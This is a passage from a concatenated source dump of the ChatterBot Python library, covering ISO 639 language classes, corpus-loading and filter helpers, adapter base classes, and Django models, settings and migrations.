ISO_639_1 = '' ISO_639 = 'kpe' ENGLISH_NAME = 'Kpelle' class KRC: ISO_639_1 = '' ISO_639 = 'krc' 
ENGLISH_NAME = 'KarachayBalkar' class KRL: ISO_639_1 = '' ISO_639 = 'krl' ENGLISH_NAME = 'Karelian' class KRU: ISO_639_1 = '' ISO_639 = 'kru' ENGLISH_NAME = 'Kurukh' class KUA: ISO_639_1 = '' ISO_639 = 'kua' ENGLISH_NAME = 'Kuanyama' class KUM: ISO_639_1 = '' ISO_639 = 'kum' ENGLISH_NAME = 'Kumyk' class KUR: ISO_639_1 = '' ISO_639 = 'kur' ENGLISH_NAME = 'Kurdish' class KUT: ISO_639_1 = '' ISO_639 = 'kut' ENGLISH_NAME = 'Kutenai' class LAD: ISO_639_1 = '' ISO_639 = 'lad' ENGLISH_NAME = 'Ladino' class LAH: ISO_639_1 = '' ISO_639 = 'lah' ENGLISH_NAME = 'Lahnda' class LAM: ISO_639_1 = '' ISO_639 = 'lam' ENGLISH_NAME = 'Lamba' class LAO: ISO_639_1 = '' ISO_639 = 'lao' ENGLISH_NAME = 'Lao' class LAT: ISO_639_1 = '' ISO_639 = 'lat' ENGLISH_NAME = 'Latin' class LAV: ISO_639_1 = '' ISO_639 = 'lav' ENGLISH_NAME = 'Latvian' class LEZ: ISO_639_1 = '' ISO_639 = 'lez' ENGLISH_NAME = 'Lezghian' class LIM: ISO_639_1 = '' ISO_639 = 'lim' ENGLISH_NAME = 'Limburgan' class LIN: ISO_639_1 = '' ISO_639 = 'lin' ENGLISH_NAME = 'Lingala' class LIT: ISO_639_1 = '' ISO_639 = 'lit' ENGLISH_NAME = 'Lithuanian' class LOL: ISO_639_1 = '' ISO_639 = 'lol' ENGLISH_NAME = 'Mongo' class LOZ: ISO_639_1 = '' ISO_639 = 'loz' ENGLISH_NAME = 'Lozi' class LTZ: ISO_639_1 = '' ISO_639 = 'ltz' ENGLISH_NAME = 'Luxembourgish' class LUA: ISO_639_1 = '' ISO_639 = 'lua' ENGLISH_NAME = 'LubaLulua' class LUB: ISO_639_1 = '' ISO_639 = 'lub' ENGLISH_NAME = 'LubaKatanga' class LUG: ISO_639_1 = '' ISO_639 = 'lug' ENGLISH_NAME = 'Ganda' class LUI: ISO_639_1 = '' ISO_639 = 'lui' ENGLISH_NAME = 'Luiseno' class LUN: ISO_639_1 = '' ISO_639 = 'lun' ENGLISH_NAME = 'Lunda' class LUO: ISO_639_1 = '' ISO_639 = 'luo' ENGLISH_NAME = 'Luo' class LUS: ISO_639_1 = '' ISO_639 = 'lus' ENGLISH_NAME = 'Lushai' class MAC: ISO_639_1 = '' ISO_639 = 'mac' ENGLISH_NAME = 'Macedonian' class MAD: ISO_639_1 = '' ISO_639 = 'mad' ENGLISH_NAME = 'Madurese' class MAG: ISO_639_1 = '' ISO_639 = 'mag' ENGLISH_NAME = 'Magahi' class MAH: ISO_639_1 = '' ISO_639 = 'mah' ENGLISH_NAME = 'Marshallese' class MAI: ISO_639_1 = '' ISO_639 = 'mai' ENGLISH_NAME = 'Maithili' class MAK: ISO_639_1 = '' ISO_639 = 'mak' ENGLISH_NAME = 'Makasar' class MAL: ISO_639_1 = '' ISO_639 = 'mal' ENGLISH_NAME = 'Malayalam' class MAN: ISO_639_1 = '' ISO_639 = 'man' ENGLISH_NAME = 'Mandingo' class MAO: ISO_639_1 = '' ISO_639 = 'mao' ENGLISH_NAME = 'Maori' class MAR: ISO_639_1 = 'mr' ISO_639 = 'mar' ENGLISH_NAME = 'Marathi' class MAS: ISO_639_1 = '' ISO_639 = 'mas' ENGLISH_NAME = 'Masai' class MAY: ISO_639_1 = '' ISO_639 = 'may' ENGLISH_NAME = 'Malay' class MDF: ISO_639_1 = '' ISO_639 = 'mdf' ENGLISH_NAME = 'Moksha' class MDR: ISO_639_1 = '' ISO_639 = 'mdr' ENGLISH_NAME = 'Mandar' class MEN: ISO_639_1 = '' ISO_639 = 'men' ENGLISH_NAME = 'Mende' class MIC: ISO_639_1 = '' ISO_639 = 'mic' ENGLISH_NAME = 'Mikmaq' class MIN: ISO_639_1 = '' ISO_639 = 'min' ENGLISH_NAME = 'Minangkabau' class MLG: ISO_639_1 = '' ISO_639 = 'mlg' ENGLISH_NAME = 'Malagasy' class MLT: ISO_639_1 = '' ISO_639 = 'mlt' ENGLISH_NAME = 'Maltese' class MNC: ISO_639_1 = '' ISO_639 = 'mnc' ENGLISH_NAME = 'Manchu' class MNI: ISO_639_1 = '' ISO_639 = 'mni' ENGLISH_NAME = 'Manipuri' class MOH: ISO_639_1 = '' ISO_639 = 'moh' ENGLISH_NAME = 'Mohawk' class MON: ISO_639_1 = '' ISO_639 = 'mon' ENGLISH_NAME = 'Mongolian' class MOS: ISO_639_1 = '' ISO_639 = 'mos' ENGLISH_NAME = 'Mossi' class MUS: ISO_639_1 = '' ISO_639 = 'mus' ENGLISH_NAME = 'Creek' class MWL: ISO_639_1 = '' ISO_639 = 'mwl' ENGLISH_NAME = 'Mirandese' class MWR: ISO_639_1 = '' ISO_639 = 
'mwr' ENGLISH_NAME = 'Marwari' class MYV: ISO_639_1 = '' ISO_639 = 'myv' ENGLISH_NAME = 'Erzya' class NAP: ISO_639_1 = '' ISO_639 = 'nap' ENGLISH_NAME = 'Neapolitan' class NAU: ISO_639_1 = '' ISO_639 = 'nau' ENGLISH_NAME = 'Nauru' class NAV: ISO_639_1 = '' ISO_639 = 'nav' ENGLISH_NAME = 'Navajo' class NBL: ISO_639_1 = '' ISO_639 = 'nbl' ENGLISH_NAME = 'Ndebele' class NDE: ISO_639_1 = '' ISO_639 = 'nde' ENGLISH_NAME = 'Ndebele' class NDO: ISO_639_1 = '' ISO_639 = 'ndo' ENGLISH_NAME = 'Ndonga' class NEP: ISO_639_1 = '' ISO_639 = 'nep' ENGLISH_NAME = 'Nepali' class NEW: ISO_639_1 = '' ISO_639 = 'new' ENGLISH_NAME = 'NepalBhasa' class NIA: ISO_639_1 = '' ISO_639 = 'nia' ENGLISH_NAME = 'Nias' class NIU: ISO_639_1 = '' ISO_639 = 'niu' ENGLISH_NAME = 'Niuean' class NNO: ISO_639_1 = '' ISO_639 = 'nno' ENGLISH_NAME = 'NorwegianNynorsk' class NOB: ISO_639_1 = '' ISO_639 = 'nob' ENGLISH_NAME = 'Bokmål' class NOG: ISO_639_1 = '' ISO_639 = 'nog' ENGLISH_NAME = 'Nogai' class NOR: ISO_639_1 = '' ISO_639 = 'nor' ENGLISH_NAME = 'Norwegian' class NQO: ISO_639_1 = '' ISO_639 = 'nqo' ENGLISH_NAME = 'NKo' class NSO: ISO_639_1 = '' ISO_639 = 'nso' ENGLISH_NAME = 'Pedi' class NYA: ISO_639_1 = '' ISO_639 = 'nya' ENGLISH_NAME = 'Chichewa' class NYM: ISO_639_1 = '' ISO_639 = 'nym' ENGLISH_NAME = 'Nyamwezi' class NYN: ISO_639_1 = '' ISO_639 = 'nyn' ENGLISH_NAME = 'Nyankole' class NYO: ISO_639_1 = '' ISO_639 = 'nyo' ENGLISH_NAME = 'Nyoro' class NZI: ISO_639_1 = '' ISO_639 = 'nzi' ENGLISH_NAME = 'Nzima' class OJI: ISO_639_1 = '' ISO_639 = 'oji' ENGLISH_NAME = 'Ojibwa' class ORI: ISO_639_1 = 'or' ISO_639 = 'ori' ENGLISH_NAME = 'Oriya' class ORM: ISO_639_1 = '' ISO_639 = 'orm' ENGLISH_NAME = 'Oromo' class OSA: ISO_639_1 = '' ISO_639 = 'osa' ENGLISH_NAME = 'Osage' class OSS: ISO_639_1 = '' ISO_639 = 'oss' ENGLISH_NAME = 'Ossetian' class PAG: ISO_639_1 = '' ISO_639 = 'pag' ENGLISH_NAME = 'Pangasinan' class PAL: ISO_639_1 = '' ISO_639 = 'pal' ENGLISH_NAME = 'Pahlavi' class PAM: ISO_639_1 = '' ISO_639 = 'pam' ENGLISH_NAME = 'Pampanga' class PAN: ISO_639_1 = '' ISO_639 = 'pan' ENGLISH_NAME = 'Panjabi' class PAP: ISO_639_1 = '' ISO_639 = 'pap' ENGLISH_NAME = 'Papiamento' class PAU: ISO_639_1 = '' ISO_639 = 'pau' ENGLISH_NAME = 'Palauan' class PER: ISO_639_1 = 'fa' ISO_639 = 'per' ENGLISH_NAME = 'Persian' class PHN: ISO_639_1 = '' ISO_639 = 'phn' ENGLISH_NAME = 'Phoenician' class PLI: ISO_639_1 = '' ISO_639 = 'pli' ENGLISH_NAME = 'Pali' class POL: ISO_639_1 = '' ISO_639 = 'pol' ENGLISH_NAME = 'Polish' class PON: ISO_639_1 = '' ISO_639 = 'pon' ENGLISH_NAME = 'Pohnpeian' class POR: ISO_639_1 = 'pt' ISO_639 = 'por' ENGLISH_NAME = 'Portuguese' class PUS: ISO_639_1 = '' ISO_639 = 'pus' ENGLISH_NAME = 'Pushto' class QUE: ISO_639_1 = '' ISO_639 = 'que' ENGLISH_NAME = 'Quechua' class RAJ: ISO_639_1 = '' ISO_639 = 'raj' ENGLISH_NAME = 'Rajasthani' class RAP: ISO_639_1 = '' ISO_639 = 'rap' ENGLISH_NAME = 'Rapanui' class RAR: ISO_639_1 = '' ISO_639 = 'rar' ENGLISH_NAME = 'Rarotongan' class ROH: ISO_639_1 = '' ISO_639 = 'roh' ENGLISH_NAME = 'Romansh' class ROM: ISO_639_1 = '' ISO_639 = 'rom' ENGLISH_NAME = 'Romany' class RUM: ISO_639_1 = '' ISO_639 = 'rum' ENGLISH_NAME = 'Romanian' class RUN: ISO_639_1 = '' ISO_639 = 'run' ENGLISH_NAME = 'Rundi' class RUP: ISO_639_1 = '' ISO_639 = 'rup' ENGLISH_NAME = 'Aromanian' class RUS: ISO_639_1 = 'ru' ISO_639 = 'rus' ENGLISH_NAME = 'Russian' class SAD: ISO_639_1 = '' ISO_639 = 'sad' ENGLISH_NAME = 'Sandawe' class SAG: ISO_639_1 = '' ISO_639 = 'sag' ENGLISH_NAME = 'Sango' class SAH: ISO_639_1 = '' 
ISO_639 = 'sah' ENGLISH_NAME = 'Yakut' class SAM: ISO_639_1 = '' ISO_639 = 'sam' ENGLISH_NAME = 'SamaritanAramaic' class SAN: ISO_639_1 = '' ISO_639 = 'san' ENGLISH_NAME = 'Sanskrit' class SAS: ISO_639_1 = '' ISO_639 = 'sas' ENGLISH_NAME = 'Sasak' class SAT: ISO_639_1 = '' ISO_639 = 'sat' ENGLISH_NAME = 'Santali' class SCN: ISO_639_1 = '' ISO_639 = 'scn' ENGLISH_NAME = 'Sicilian' class SCO: ISO_639_1 = '' ISO_639 = 'sco' ENGLISH_NAME = 'Scots' class SEL: ISO_639_1 = '' ISO_639 = 'sel' ENGLISH_NAME = 'Selkup' class SHN: ISO_639_1 = '' ISO_639 = 'shn' ENGLISH_NAME = 'Shan' class SID: ISO_639_1 = '' ISO_639 = 'sid' ENGLISH_NAME = 'Sidamo' class SIN: ISO_639_1 = '' ISO_639 = 'sin' ENGLISH_NAME = 'Sinhala' class SLO: ISO_639_1 = '' ISO_639 = 'slo' ENGLISH_NAME = 'Slovak' class SLV: ISO_639_1 = '' ISO_639 = 'slv' ENGLISH_NAME = 'Slovenian' class SMA: ISO_639_1 = '' ISO_639 = 'sma' ENGLISH_NAME = 'SouthernSami' class SME: ISO_639_1 = '' ISO_639 = 'sme' ENGLISH_NAME = 'NorthernSami' class SMJ: ISO_639_1 = '' ISO_639 = 'smj' ENGLISH_NAME = 'LuleSami' class SMN: ISO_639_1 = '' ISO_639 = 'smn' ENGLISH_NAME = 'InariSami' class SMO: ISO_639_1 = '' ISO_639 = 'smo' ENGLISH_NAME = 'Samoan' class SMS: ISO_639_1 = '' ISO_639 = 'sms' ENGLISH_NAME = 'SkoltSami' class SNA: ISO_639_1 = '' ISO_639 = 'sna' ENGLISH_NAME = 'Shona' class SND: ISO_639_1 = '' ISO_639 = 'snd' ENGLISH_NAME = 'Sindhi' class SNK: ISO_639_1 = '' ISO_639 = 'snk' ENGLISH_NAME = 'Soninke' class SOG: ISO_639_1 = '' ISO_639 = 'sog' ENGLISH_NAME = 'Sogdian' class SOM: ISO_639_1 = '' ISO_639 = 'som' ENGLISH_NAME = 'Somali' class SOT: ISO_639_1 = '' ISO_639 = 'sot' ENGLISH_NAME = 'Sotho' class SPA: ISO_639_1 = 'es' ISO_639 = 'spa' ENGLISH_NAME = 'Spanish' class SRD: ISO_639_1 = '' ISO_639 = 'srd' ENGLISH_NAME = 'Sardinian' class SRN: ISO_639_1 = '' ISO_639 = 'srn' ENGLISH_NAME = 'SrananTongo' class SRP: ISO_639_1 = '' ISO_639 = 'srp' ENGLISH_NAME = 'Serbian' class SRR: ISO_639_1 = '' ISO_639 = 'srr' ENGLISH_NAME = 'Serer' class SSW: ISO_639_1 = '' ISO_639 = 'ssw' ENGLISH_NAME = 'Swati' class SUK: ISO_639_1 = '' ISO_639 = 'suk' ENGLISH_NAME = 'Sukuma' class SUN: ISO_639_1 = '' ISO_639 = 'sun' ENGLISH_NAME = 'Sundanese' class SUS: ISO_639_1 = '' ISO_639 = 'sus' ENGLISH_NAME = 'Susu' class SUX: ISO_639_1 = '' ISO_639 = 'sux' ENGLISH_NAME = 'Sumerian' class SWA: ISO_639_1 = '' ISO_639 = 'swa' ENGLISH_NAME = 'Swahili' class SWE: ISO_639_1 = 'sv' ISO_639 = 'swe' ENGLISH_NAME = 'Swedish' class SYC: ISO_639_1 = '' ISO_639 = 'syc' ENGLISH_NAME = 'ClassicalSyriac' class SYR: ISO_639_1 = '' ISO_639 = 'syr' ENGLISH_NAME = 'Syriac' class TAH: ISO_639_1 = 'th' ISO_639 = 'tah' ENGLISH_NAME = 'Tahitian' class TAM: ISO_639_1 = '' ISO_639 = 'tam' ENGLISH_NAME = 'Tamil' class TAT: ISO_639_1 = '' ISO_639 = 'tat' ENGLISH_NAME = 'Tatar' class TEL: ISO_639_1 = 'te' ISO_639 = 'tel' ENGLISH_NAME = 'Telugu' class TEM: ISO_639_1 = '' ISO_639 = 'tem' ENGLISH_NAME = 'Timne' class TER: ISO_639_1 = '' ISO_639 = 'ter' ENGLISH_NAME = 'Tereno' class TET: ISO_639_1 = '' ISO_639 = 'tet' ENGLISH_NAME = 'Tetum' class TGK: ISO_639_1 = '' ISO_639 = 'tgk' ENGLISH_NAME = 'Tajik' class TGL: ISO_639_1 = '' ISO_639 = 'tgl' ENGLISH_NAME = 'Tagalog' class THA: ISO_639_1 = '' ISO_639 = 'tha' ENGLISH_NAME = 'Thai' class TIB: ISO_639_1 = '' ISO_639 = 'tib' ENGLISH_NAME = 'Tibetan' class TIG: ISO_639_1 = '' ISO_639 = 'tig' ENGLISH_NAME = 'Tigre' class TIR: ISO_639_1 = '' ISO_639 = 'tir' ENGLISH_NAME = 'Tigrinya' class TIV: ISO_639_1 = '' ISO_639 = 'tiv' ENGLISH_NAME = 'Tiv' class TKL: ISO_639_1 = 
'' ISO_639 = 'tkl' ENGLISH_NAME = 'Tokelau' class TLH: ISO_639_1 = '' ISO_639 = 'tlh' ENGLISH_NAME = 'Klingon' class TLI: ISO_639_1 = '' ISO_639 = 'tli' ENGLISH_NAME = 'Tlingit' class TMH: ISO_639_1 = '' ISO_639 = 'tmh' ENGLISH_NAME = 'Tamashek' class TOG: ISO_639_1 = '' ISO_639 = 'tog' ENGLISH_NAME = 'Tonga' class TON: ISO_639_1 = '' ISO_639 = 'ton' ENGLISH_NAME = 'Tonga' class TPI: ISO_639_1 = '' ISO_639 = 'tpi' ENGLISH_NAME = 'TokPisin' class TSI: ISO_639_1 = '' ISO_639 = 'tsi' ENGLISH_NAME = 'Tsimshian' class TSN: ISO_639_1 = '' ISO_639 = 'tsn' ENGLISH_NAME = 'Tswana' class TSO: ISO_639_1 = '' ISO_639 = 'tso' ENGLISH_NAME = 'Tsonga' class TUK: ISO_639_1 = '' ISO_639 = 'tuk' ENGLISH_NAME = 'Turkmen' class TUM: ISO_639_1 = '' ISO_639 = 'tum' ENGLISH_NAME = 'Tumbuka' class TUR: ISO_639_1 = '' ISO_639 = 'tur' ENGLISH_NAME = 'Turkish' class TVL: ISO_639_1 = '' ISO_639 = 'tvl' ENGLISH_NAME = 'Tuvalu' class TWI: ISO_639_1 = '' ISO_639 = 'twi' ENGLISH_NAME = 'Twi' class TYV: ISO_639_1 = '' ISO_639 = 'tyv' ENGLISH_NAME = 'Tuvinian' class UDM: ISO_639_1 = '' ISO_639 = 'udm' ENGLISH_NAME = 'Udmurt' class UGA: ISO_639_1 = '' ISO_639 = 'uga' ENGLISH_NAME = 'Ugaritic' class UIG: ISO_639_1 = '' ISO_639 = 'uig' ENGLISH_NAME = 'Uighur' class UKR: ISO_639_1 = '' ISO_639 = 'ukr' ENGLISH_NAME = 'Ukrainian' class UMB: ISO_639_1 = '' ISO_639 = 'umb' ENGLISH_NAME = 'Umbundu' class UND: ISO_639_1 = '' ISO_639 = 'und' ENGLISH_NAME = 'Undetermined' class URD: ISO_639_1 = '' ISO_639 = 'urd' ENGLISH_NAME = 'Urdu' class UZB: ISO_639_1 = '' ISO_639 = 'uzb' ENGLISH_NAME = 'Uzbek' class VAI: ISO_639_1 = '' ISO_639 = 'vai' ENGLISH_NAME = 'Vai' class VEN: ISO_639_1 = '' ISO_639 = 'ven' ENGLISH_NAME = 'Venda' class VIE: ISO_639_1 = '' ISO_639 = 'vie' ENGLISH_NAME = 'Vietnamese' class VOL: ISO_639_1 = '' ISO_639 = 'vol' ENGLISH_NAME = 'Volapük' class VOT: ISO_639_1 = '' ISO_639 = 'vot' ENGLISH_NAME = 'Votic' class WAL: ISO_639_1 = '' ISO_639 = 'wal' ENGLISH_NAME = 'Wolaitta' class WAR: ISO_639_1 = '' ISO_639 = 'war' ENGLISH_NAME = 'Waray' class WAS: ISO_639_1 = '' ISO_639 = 'was' ENGLISH_NAME = 'Washo' class WEL: ISO_639_1 = '' ISO_639 = 'wel' ENGLISH_NAME = 'Welsh' class WLN: ISO_639_1 = '' ISO_639 = 'wln' ENGLISH_NAME = 'Walloon' class WOL: ISO_639_1 = '' ISO_639 = 'wol' ENGLISH_NAME = 'Wolof' class XAL: ISO_639_1 = '' ISO_639 = 'xal' ENGLISH_NAME = 'Kalmyk' class XHO: ISO_639_1 = '' ISO_639 = 'xho' ENGLISH_NAME = 'Xhosa' class YAO: ISO_639_1 = '' ISO_639 = 'yao' ENGLISH_NAME = 'Yao' class YAP: ISO_639_1 = '' ISO_639 = 'yap' ENGLISH_NAME = 'Yapese' class YID: ISO_639_1 = '' ISO_639 = 'yid' ENGLISH_NAME = 'Yiddish' class YOR: ISO_639_1 = '' ISO_639 = 'yor' ENGLISH_NAME = 'Yoruba' class ZAP: ISO_639_1 = '' ISO_639 = 'zap' ENGLISH_NAME = 'Zapotec' class ZBL: ISO_639_1 = '' ISO_639 = 'zbl' ENGLISH_NAME = 'Blissymbols' class ZEN: ISO_639_1 = '' ISO_639 = 'zen' ENGLISH_NAME = 'Zenaga' class ZGH: ISO_639_1 = '' ISO_639 = 'zgh' ENGLISH_NAME = 'StandardMoroccanTamazight' class ZHA: ISO_639_1 = '' ISO_639 = 'zha' ENGLISH_NAME = 'Zhuang' class ZHS: ISO_639_1 = '' ISO_639 = 'zhs' ENGLISH_NAME = 'SimplifiedChinese' class ZHT: ISO_639_1 = '' ISO_639 = 'zht' ENGLISH_NAME = 'TraditionalChinese' class ZUL: ISO_639_1 = '' ISO_639 = 'zul' ENGLISH_NAME = 'Zulu' class ZUN: ISO_639_1 = '' ISO_639 = 'zun' ENGLISH_NAME = 'Zuni' class ZZA: ISO_639_1 = '' ISO_639 = 'zza' ENGLISH_NAME = 'Zaza' def get_language_classes(): import sys import inspect return inspect.getmembers(sys.modules[__name__], inspect.isclass) File: chatterbot/__main__.py 
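
# Usage sketch (an assumption: the package sits next to its setup.cfg, as in a
# source checkout, so the version string can be read from that file):
#
#     python -m chatterbot --version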
import configparser import sys import os def get_chatterbot_version(): config = configparser.ConfigParser() current_directory = os.path.dirname(os.path.abspath(__file__)) parent_directory = os.path.abspath(os.path.join(current_directory, os.pardir)) config_file_path = os.path.join(parent_directory, 'setup.cfg') config.read(config_file_path) return config['chatterbot']['version'] if __name__ == '__main__': if '--version' in sys.argv: print(get_chatterbot_version()) File: chatterbot/filters.py def get_recent_repeated_responses(chatbot, conversation, sample=10, threshold=3, quantity=3): """ A filter that eliminates possibly repetitive responses to prevent a chat bot from repeating statements that it has recently said. """ from collections import Counter # Get the most recent statements from the conversation conversation_statements = list(chatbot.storage.filter( conversation=conversation, order_by=['id'] ))[sample * -1:] text_of_recent_responses = [ statement.text for statement in conversation_statements ] counter = Counter(text_of_recent_responses) # Find the n most common responses from the conversation most_common = counter.most_common(quantity) return [ counted[0] for counted in most_common if counted[1] >= threshold ] File: chatterbot/corpus.py import os import io import glob from pathlib import Path from chatterbot.exceptions import OptionalDependencyImportError try: from chatterbot_corpus.corpus import DATA_DIRECTORY except (ImportError, ModuleNotFoundError): # Default to the home directory of the current user DATA_DIRECTORY = os.path.join( Path.home(), 'chatterbot_corpus', 'data' ) CORPUS_EXTENSION = 'yml' def get_file_path(dotted_path, extension='json'): """ Reads a dotted file path and returns the file path. """ # If the operating system's file path seperator character is in the string if os.sep in dotted_path or '/' in dotted_path: # Assume the path is a valid file path return dotted_path parts = dotted_path.split('.') if parts[0] == 'chatterbot': parts.pop(0) parts[0] = DATA_DIRECTORY corpus_path = os.path.join(*parts) path_with_extension = '{}.{}'.format(corpus_path, extension) if os.path.exists(path_with_extension): corpus_path = path_with_extension return corpus_path def read_corpus(file_name): """ Read and return the data from a corpus json file. """ try: import yaml except ImportError: message = ( 'Unable to import "yaml".\n' 'Please install "pyyaml" to enable chatterbot corpus functionality:\n' 'pip3 install pyyaml' ) raise OptionalDependencyImportError(message) with io.open(file_name, encoding='utf-8') as data_file: return yaml.safe_load(data_file) def list_corpus_files(dotted_path): """ Return a list of file paths to each data file in the specified corpus. """ corpus_path = get_file_path(dotted_path, extension=CORPUS_EXTENSION) paths = [] if os.path.isdir(corpus_path): paths = glob.glob(corpus_path + '/**/*.' + CORPUS_EXTENSION, recursive=True) else: paths.append(corpus_path) paths.sort() return paths def load_corpus(*data_file_paths): """ Return the data contained within a specified corpus. """ for file_path in data_file_paths: corpus = [] corpus_data = read_corpus(file_path) conversations = corpus_data.get('conversations', []) corpus.extend(conversations) categories = corpus_data.get('categories', []) yield corpus, categories, file_path File: chatterbot/adapters.py class Adapter(object): """ A superclass for all adapter classes. :param chatbot: A ChatBot instance. 
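
    A minimal subclassing sketch (``EchoAdapter`` is a hypothetical name used
    only for illustration)::

        class EchoAdapter(Adapter):
            # self.chatbot is set by Adapter.__init__
            def echo(self, text):
                return '{} says: {}'.format(self.chatbot.name, text)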
""" def __init__(self, chatbot, **kwargs): self.chatbot = chatbot class AdapterMethodNotImplementedError(NotImplementedError): """ An exception to be raised when an adapter method has not been implemented. Typically this indicates that the developer is expected to implement the method in a subclass. """ def __init__(self, message='This method must be overridden in a subclass method.'): """ Set the message for the exception. """ super().__init__(message) class InvalidAdapterTypeException(Exception): """ An exception to be raised when an adapter of an unexpected class type is received. """ pass File: chatterbot/ext/__init__.py File: chatterbot/ext/django_chatterbot/model_admin.py from django.contrib import admin class StatementAdmin(admin.ModelAdmin): list_display = ('text', 'in_response_to', 'conversation', 'created_at', ) list_filter = ('text', 'created_at', ) search_fields = ('text', ) class TagAdmin(admin.ModelAdmin): list_display = ('name', ) list_filter = ('name', ) search_fields = ('name', ) File: chatterbot/ext/django_chatterbot/abstract_models.py from chatterbot.conversation import StatementMixin from chatterbot import constants from django.db import models from django.utils import timezone from django.conf import settings DJANGO_APP_NAME = constants.DEFAULT_DJANGO_APP_NAME STATEMENT_MODEL = 'Statement' TAG_MODEL = 'Tag' if hasattr(settings, 'CHATTERBOT'): """ Allow related models to be overridden in the project settings. Default to the original settings if one is not defined. """ DJANGO_APP_NAME = settings.CHATTERBOT.get( 'django_app_name', DJANGO_APP_NAME ) STATEMENT_MODEL = settings.CHATTERBOT.get( 'statement_model', STATEMENT_MODEL ) class AbstractBaseTag(models.Model): """ The abstract base tag allows other models to be created using the attributes that exist on the default models. """ name = models.SlugField( max_length=constants.TAG_NAME_MAX_LENGTH, unique=True ) class Meta: abstract = True def __str__(self): return self.name class AbstractBaseStatement(models.Model, StatementMixin): """ The abstract base statement allows other models to be created using the attributes that exist on the default models. """ text = models.CharField( max_length=constants.STATEMENT_TEXT_MAX_LENGTH ) search_text = models.CharField( max_length=constants.STATEMENT_TEXT_MAX_LENGTH, blank=True ) conversation = models.CharField( max_length=constants.CONVERSATION_LABEL_MAX_LENGTH ) created_at = models.DateTimeField( default=timezone.now, help_text='The date and time that the statement was created at.' ) in_response_to = models.CharField( max_length=constants.STATEMENT_TEXT_MAX_LENGTH, null=True ) search_in_response_to = models.CharField( max_length=constants.STATEMENT_TEXT_MAX_LENGTH, blank=True ) persona = models.CharField( max_length=constants.PERSONA_MAX_LENGTH ) tags = models.ManyToManyField( TAG_MODEL, related_name='statements' ) # This is the confidence with which the chat bot believes # this is an accurate response. This value is set when the # statement is returned by the chat bot. confidence = 0 class Meta: abstract = True def __str__(self): if len(self.text.strip()) > 60: return '{}...'.format(self.text[:57]) elif len(self.text.strip()) > 0: return self.text return '<empty>' def get_tags(self): """ Return the list of tags for this statement. (Overrides the method from StatementMixin) """ return list(self.tags.values_list('name', flat=True)) def add_tags(self, *tags): """ Add a list of strings to the statement as tags. 
(Overrides the method from StatementMixin) """ for _tag in tags: self.tags.get_or_create(name=_tag) File: chatterbot/ext/django_chatterbot/models.py from chatterbot.ext.django_chatterbot.abstract_models import AbstractBaseStatement, AbstractBaseTag class Statement(AbstractBaseStatement): """ A statement represents a single spoken entity, sentence or phrase that someone can say. """ pass class Tag(AbstractBaseTag): """ A label that categorizes a statement. """ pass File: chatterbot/ext/django_chatterbot/__init__.py default_app_config = ( 'chatterbot.ext.django_chatterbot.apps.DjangoChatterBotConfig' ) File: chatterbot/ext/django_chatterbot/apps.py from django.apps import AppConfig class DjangoChatterBotConfig(AppConfig): name = 'chatterbot.ext.django_chatterbot' label = 'django_chatterbot' verbose_name = 'Django ChatterBot' File: chatterbot/ext/django_chatterbot/admin.py from django.contrib import admin from chatterbot.ext.django_chatterbot.model_admin import StatementAdmin, TagAdmin from chatterbot.ext.django_chatterbot.models import Statement, Tag admin.site.register(Statement, StatementAdmin) admin.site.register(Tag, TagAdmin) File: chatterbot/ext/django_chatterbot/settings.py """ Default ChatterBot settings for Django. """ from django.conf import settings from chatterbot import constants CHATTERBOT_SETTINGS = getattr(settings, 'CHATTERBOT', {}) CHATTERBOT_DEFAULTS = { 'name': 'ChatterBot', 'storage_adapter': 'chatterbot.storage.DjangoStorageAdapter', 'django_app_name': constants.DEFAULT_DJANGO_APP_NAME } CHATTERBOT = CHATTERBOT_DEFAULTS.copy() CHATTERBOT.update(CHATTERBOT_SETTINGS) File: chatterbot/ext/django_chatterbot/migrations/0013_change_conversations.py # Generated by Django 1.11 on 2018-09-13 01:01 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0012_statement_created_at'), ] operations = [ migrations.RemoveField( model_name='conversation', name='responses', ), migrations.RemoveField( model_name='response', name='response', ), migrations.RemoveField( model_name='response', name='statement', ), migrations.AddField( model_name='statement', name='conversation', field=models.CharField(default='default', max_length=32), preserve_default=False, ), migrations.AddField( model_name='statement', name='in_response_to', field=models.CharField(max_length=400, null=True), ), migrations.AlterField( model_name='statement', name='text', field=models.CharField(max_length=400), ), migrations.DeleteModel( name='Conversation', ), migrations.DeleteModel( name='Response', ), ] File: chatterbot/ext/django_chatterbot/migrations/0016_statement_stemmed_text.py from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0015_statement_persona'), ] operations = [ migrations.AddField( model_name='statement', name='search_text', field=models.CharField(blank=True, max_length=400), ), migrations.AddField( model_name='statement', name='search_in_response_to', field=models.CharField(blank=True, max_length=400), ), ] File: chatterbot/ext/django_chatterbot/migrations/0018_text_max_length.py from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0017_tags_unique'), ] operations = [ migrations.AlterField( model_name='statement', name='in_response_to', field=models.CharField(max_length=255, null=True), ), migrations.AlterField( model_name='statement', name='search_in_response_to', field=models.CharField(blank=True, 
max_length=255), ), migrations.AlterField( model_name='statement', name='search_text', field=models.CharField(blank=True, max_length=255), ), migrations.AlterField( model_name='statement', name='text', field=models.CharField(max_length=255), ), ] File: chatterbot/ext/django_chatterbot/migrations/0017_tags_unique.py from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0016_statement_stemmed_text'), ] operations = [ migrations.RemoveField( model_name='tag', name='statements', ), migrations.AddField( model_name='statement', name='tags', field=models.ManyToManyField( related_name='statements', to='django_chatterbot.Tag' ), ), migrations.AlterField( model_name='tag', name='name', field=models.SlugField(unique=True), ), ] File: chatterbot/ext/django_chatterbot/migrations/0004_rename_in_response_to.py # Generated by Django 1.10.3 on 2016-12-04 23:52 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0003_change_occurrence_default'), ] operations = [ migrations.AlterField( model_name='response', name='statement', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='in_response', to='django_chatterbot.Statement'), ), migrations.AlterField( model_name='response', name='response', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='responses', to='django_chatterbot.Statement'), ), ] File: chatterbot/ext/django_chatterbot/migrations/0007_response_created_at.py # Generated by Django 1.11 on 2017-07-18 00:16 from django.db import migrations, models import django.utils.timezone class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0006_create_conversation'), ] operations = [ 